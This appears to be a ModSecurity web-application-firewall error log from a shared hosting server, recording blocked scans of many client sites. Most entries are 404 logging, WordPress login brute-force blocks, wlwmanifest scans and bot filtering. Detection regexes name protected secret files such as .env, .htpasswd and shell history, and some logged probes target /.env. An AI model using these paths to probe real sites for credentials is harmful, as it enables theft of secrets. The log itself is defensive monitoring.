[Tue May 26 19:09:35.155741 2026] [security2:error] [pid 6038:tid 6240] [client 176.65.139.239:42882] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "meet.moes-art.com"] [uri "/.env"] [unique_id "ahWil1HA3ZmGrHHEr4q5AAAAAM0"]
[Tue May 26 19:09:36.254584 2026] [security2:error] [pid 6038:tid 6045] [remote 103.11.102.106:41830] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWimFHA3ZmGrHHEr4q5HgAAtwY"]
[Tue May 26 19:09:37.175785 2026] [security2:error] [pid 6038:tid 6212] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWimFHA3ZmGrHHEr4q5NAAAALE"]
[Tue May 26 19:09:37.573248 2026] [security2:error] [pid 6038:tid 6155] [remote 43.155.125.77:43666] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.wrapmachines.com"] [uri "/index.php"] [unique_id "ahWil1HA3ZmGrHHEr4q5EwAA-nQ"], referer: https://www.google.com/search?q=wrapmachines.com
[Tue May 26 19:09:38.174974 2026] [security2:error] [pid 6038:tid 6056] [remote 216.73.217.110:20163] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 110.217.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/webhook.php"] [unique_id "ahWimlHA3ZmGrHHEr4q5VQAArxE"]
[Tue May 26 19:09:38.951137 2026] [security2:error] [pid 6038:tid 6224] [client 202.76.175.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWimlHA3ZmGrHHEr4q5ZAAAAL0"]
[Tue May 26 19:09:39.336939 2026] [security2:error] [pid 6038:tid 6229] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWimlHA3ZmGrHHEr4q5cAAAAMI"]
[Tue May 26 19:09:40.496191 2026] [security2:error] [pid 6038:tid 6227] [client 74.7.230.6:52426] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWinFHA3ZmGrHHEr4q5nAAAwCQ"]
[Tue May 26 19:09:41.470351 2026] [security2:error] [pid 6038:tid 6175] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWinVHA3ZmGrHHEr4q5rQAAAIw"]
[Tue May 26 19:09:42.767898 2026] [autoindex:error] [pid 6038:tid 6179] [client 66.132.186.171:53924] AH01276: Cannot serve directory /home1/omshriin/public_html/omshriinfra.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:09:43.060463 2026] [security2:error] [pid 6038:tid 6214] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWinlHA3ZmGrHHEr4q6BwAAALM"]
[Tue May 26 19:09:43.081193 2026] [security2:error] [pid 6038:tid 6284] [client 66.249.66.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.shardagalaxy.com"] [uri "/index.php"] [unique_id "ahWinFHA3ZmGrHHEr4q5pQAAAPk"]
[Tue May 26 19:09:43.996596 2026] [security2:error] [pid 6038:tid 6117] [remote 18.190.7.192:39270] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.7.190.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWin1HA3ZmGrHHEr4q6RgAA0U4"]
[Tue May 26 19:09:44.057031 2026] [security2:error] [pid 6038:tid 6221] [client 68.183.88.172:53476] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "jhonparra.com"] [uri "/"] [unique_id "ahWioFHA3ZmGrHHEr4q6VwAAALo"]
[Tue May 26 19:09:45.628328 2026] [security2:error] [pid 6038:tid 6251] [client 167.160.64.247:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWioVHA3ZmGrHHEr4q6lgAAANg"], referer: https://www.anujtradingco.com/
[Tue May 26 19:09:45.904753 2026] [security2:error] [pid 6038:tid 6259] [client 65.109.156.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWioVHA3ZmGrHHEr4q6nwAAAOA"]
[Tue May 26 19:09:45.904789 2026] [security2:error] [pid 6038:tid 6259] [client 65.109.156.37:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWioVHA3ZmGrHHEr4q6nwAAAOA"]
[Tue May 26 19:09:45.905178 2026] [security2:error] [pid 6038:tid 6260] [client 65.109.156.37:60486] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/shop-2/shop-accessories/"] [unique_id "ahWioVHA3ZmGrHHEr4q6nQAAAOE"]
[Tue May 26 19:09:46.325078 2026] [security2:error] [pid 6038:tid 6202] [client 65.109.156.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWiolHA3ZmGrHHEr4q6sQAAAKc"]
[Tue May 26 19:09:46.325103 2026] [security2:error] [pid 6038:tid 6202] [client 65.109.156.37:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWiolHA3ZmGrHHEr4q6sQAAAKc"]
[Tue May 26 19:09:46.325554 2026] [security2:error] [pid 6038:tid 6266] [client 65.109.156.37:60640] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/shop-2/shop-accessories/"] [unique_id "ahWiolHA3ZmGrHHEr4q6rwAAAOc"]
[Tue May 26 19:09:46.412331 2026] [security2:error] [pid 6038:tid 6172] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWioVHA3ZmGrHHEr4q6qAAAAIk"]
[Tue May 26 19:09:46.885917 2026] [security2:error] [pid 6038:tid 6212] [client 167.160.64.247:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWiolHA3ZmGrHHEr4q6xAAAALE"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1246022&moderation-hash=657e4c20e1b70b3707134c7fedbed133
[Tue May 26 19:09:47.221545 2026] [security2:error] [pid 6038:tid 6115] [remote 18.190.7.192:39270] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.7.190.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWio1HA3ZmGrHHEr4q60QAA9Uw"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:09:50.007386 2026] [security2:error] [pid 6038:tid 6223] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWipVHA3ZmGrHHEr4q7IAAAALw"]
[Tue May 26 19:09:50.754199 2026] [security2:error] [pid 6038:tid 6245] [client 216.26.231.199:48363] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "eco-green.com.mx"] [uri "/"] [unique_id "ahWiplHA3ZmGrHHEr4q7PQAAANI"]
[Tue May 26 19:09:50.882454 2026] [security2:error] [pid 6038:tid 6143] [remote 162.214.121.181:40094] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 181.121.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWiplHA3ZmGrHHEr4q7OQAAh2g"]
[Tue May 26 19:09:51.611566 2026] [security2:error] [pid 6038:tid 6139] [remote 162.214.121.181:40094] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 181.121.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWip1HA3ZmGrHHEr4q7UQAAoGQ"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:09:52.000009 2026] [security2:error] [pid 6038:tid 6226] [client 65.111.12.49:50969] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "eco-green.com.mx"] [uri "/wp-login.php"] [unique_id "ahWip1HA3ZmGrHHEr4q7UAAAAL8"]
[Tue May 26 19:09:52.104850 2026] [security2:error] [pid 6038:tid 6185] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWip1HA3ZmGrHHEr4q7WAAAAJY"]
[Tue May 26 19:09:54.237774 2026] [security2:error] [pid 6038:tid 6249] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiqVHA3ZmGrHHEr4q7qwAAANY"]
[Tue May 26 19:09:56.387221 2026] [security2:error] [pid 6038:tid 6183] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiq1HA3ZmGrHHEr4q8FAAAAJQ"]
[Tue May 26 19:09:57.376217 2026] [security2:error] [pid 6038:tid 6196] [client 167.160.64.247:61767] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWirFHA3ZmGrHHEr4q8NwAAAKE"], referer: https://anujtradingco.com
[Tue May 26 19:09:58.223084 2026] [security2:error] [pid 6038:tid 6284] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWirVHA3ZmGrHHEr4q8cwAAAPk"]
[Tue May 26 19:09:59.917503 2026] [security2:error] [pid 6038:tid 6270] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWir1HA3ZmGrHHEr4q8oAAAAOs"]
[Tue May 26 19:10:01.580327 2026] [security2:error] [pid 6038:tid 6260] [client 66.132.172.200:61830] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "tea.canopykaapi.com"] [uri "/index.php"] [unique_id "ahWisVHA3ZmGrHHEr4q8zAAAAOE"]
[Tue May 26 19:10:02.326717 2026] [security2:error] [pid 6038:tid 6267] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWisVHA3ZmGrHHEr4q81gAAAOg"]
[Tue May 26 19:10:04.614707 2026] [security2:error] [pid 6038:tid 6230] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWitFHA3ZmGrHHEr4q9OAAAAMM"]
[Tue May 26 19:10:06.008777 2026] [security2:error] [pid 6038:tid 6244] [client 14.162.166.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWitVHA3ZmGrHHEr4q9bwAAANE"]
[Tue May 26 19:10:06.233606 2026] [security2:error] [pid 6038:tid 6288] [client 114.119.132.104:21573] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "d2cargo.com"] [uri "/robots.txt"] [unique_id "ahWitlHA3ZmGrHHEr4q9lAAAAP0"]
[Tue May 26 19:10:06.590822 2026] [security2:error] [pid 6038:tid 6124] [remote 104.37.84.101:57418] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 101.84.37.104.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWitlHA3ZmGrHHEr4q9lwAA5lU"]
[Tue May 26 19:10:06.951837 2026] [security2:error] [pid 6038:tid 6267] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWitlHA3ZmGrHHEr4q9pQAAAOg"]
[Tue May 26 19:10:07.545519 2026] [security2:error] [pid 6038:tid 6041] [remote 88.198.165.116:44900] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.165.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWit1HA3ZmGrHHEr4q91wAA1wI"]
[Tue May 26 19:10:07.760406 2026] [security2:error] [pid 6038:tid 6135] [remote 103.145.62.145:11178] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 145.62.145.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWit1HA3ZmGrHHEr4q94AAA1mA"]
[Tue May 26 19:10:08.536540 2026] [security2:error] [pid 6038:tid 6152] [remote 103.145.62.145:11178] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 145.62.145.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWiuFHA3ZmGrHHEr4q-AwAArXE"], referer: https://preetishah.moes-art.com/wp-login.php
[Tue May 26 19:10:08.922647 2026] [security2:error] [pid 6038:tid 6293] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiuFHA3ZmGrHHEr4q-CwAAAQI"]
[Tue May 26 19:10:10.659862 2026] [security2:error] [pid 6038:tid 6189] [client 176.65.139.239:48164] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahWiulHA3ZmGrHHEr4q-RAAAAJo"]
[Tue May 26 19:10:11.258954 2026] [security2:error] [pid 6038:tid 6176] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiulHA3ZmGrHHEr4q-TQAAAI0"]
[Tue May 26 19:10:13.294740 2026] [security2:error] [pid 6038:tid 6177] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWivFHA3ZmGrHHEr4q-ewAAAI4"]
[Tue May 26 19:10:15.319245 2026] [security2:error] [pid 6038:tid 6203] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWivlHA3ZmGrHHEr4q-rAAAAKg"]
[Tue May 26 19:10:17.567238 2026] [security2:error] [pid 6038:tid 6273] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiwVHA3ZmGrHHEr4q-8AAAAO4"]
[Tue May 26 19:10:17.821039 2026] [security2:error] [pid 6038:tid 6171] [client 35.255.164.74:50954] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.164.255.35.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "worldwidecourier.co.in.onesoft.in"] [uri "/xmlrpc.php"] [unique_id "ahWiwVHA3ZmGrHHEr4q-_wAAAIg"]
[Tue May 26 19:10:17.859454 2026] [security2:error] [pid 6038:tid 6183] [client 35.255.164.74:50806] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.164.255.35.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "worldwidecourier.co.in"] [uri "/xmlrpc.php"] [unique_id "ahWiwVHA3ZmGrHHEr4q_BgAAAJQ"]
[Tue May 26 19:10:18.163908 2026] [security2:error] [pid 6038:tid 6211] [client 35.255.164.74:50415] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "worldwidecourier.co.in"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahWiwlHA3ZmGrHHEr4q_DQAAALA"]
[Tue May 26 19:10:18.168136 2026] [security2:error] [pid 6038:tid 6194] [client 35.255.164.74:62788] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "worldwidecourier.co.in.onesoft.in"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahWiwlHA3ZmGrHHEr4q_DgAAAJ8"]
[Tue May 26 19:10:18.561183 2026] [security2:error] [pid 6038:tid 6235] [client 35.255.164.74:58336] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "worldwidecourier.co.in.onesoft.in"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahWiwlHA3ZmGrHHEr4q_GQAAAMg"]
[Tue May 26 19:10:18.561695 2026] [security2:error] [pid 6038:tid 6190] [client 35.255.164.74:55997] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "worldwidecourier.co.in"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahWiwlHA3ZmGrHHEr4q_GgAAAJs"]
[Tue May 26 19:10:18.897603 2026] [security2:error] [pid 6038:tid 6252] [client 35.255.164.74:59975] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "worldwidecourier.co.in.onesoft.in"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahWiwlHA3ZmGrHHEr4q_IQAAANk"]
[Tue May 26 19:10:18.956006 2026] [security2:error] [pid 6038:tid 6203] [client 35.255.164.74:53257] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "worldwidecourier.co.in"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahWiwlHA3ZmGrHHEr4q_IgAAAKg"]
[Tue May 26 19:10:19.191549 2026] [security2:error] [pid 6038:tid 6199] [client 35.255.164.74:54365] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "worldwidecourier.co.in.onesoft.in"] [uri "/2020/wp-includes/wlwmanifest.xml"] [unique_id "ahWiw1HA3ZmGrHHEr4q_MAAAAKQ"]
[Tue May 26 19:10:19.327997 2026] [security2:error] [pid 6038:tid 6207] [client 35.255.164.74:53268] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "worldwidecourier.co.in"] [uri "/2020/wp-includes/wlwmanifest.xml"] [unique_id "ahWiw1HA3ZmGrHHEr4q_NQAAAKw"]
[Tue May 26 19:10:19.380021 2026] [security2:error] [pid 6038:tid 6094] [remote 78.142.18.172:38312] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWiw1HA3ZmGrHHEr4q_LgAAojc"]
[Tue May 26 19:10:19.582304 2026] [security2:error] [pid 6038:tid 6273] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiw1HA3ZmGrHHEr4q_LwAAAO4"]
